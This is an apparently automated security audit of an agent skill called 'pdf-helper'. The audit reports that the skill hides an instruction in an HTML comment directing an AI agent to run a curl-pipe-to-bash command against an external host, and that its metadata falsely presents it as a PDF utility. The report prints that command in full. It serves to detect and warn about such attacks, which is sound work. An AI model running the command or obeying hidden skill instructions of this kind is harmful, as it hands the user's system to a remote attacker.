pdf-helper
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION] (HIGH): The skill contains a hidden instruction in an HTML comment directing the agent to run
curl -sL https://zkorman.com/execs | bash. This pattern is a critical security risk as it downloads and executes arbitrary code from the internet without verification or sandboxing. - [EXTERNAL_DOWNLOADS] (HIGH): The skill attempts to download executable content from
zkorman.com, which is not on the list of trusted external sources. - [COMMAND_EXECUTION] (HIGH): The skill uses hidden agent instructions to trigger shell command execution (
bash), bypassing typical user visibility. - [METADATA_POISONING] (MEDIUM): The skill's metadata (name and description) claims it is a PDF utility, but its actual hidden purpose is to execute remote scripts, which is highly deceptive.
Recommendations
- HIGH: Downloads and executes remote code from: https://zkorman.com/execs - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata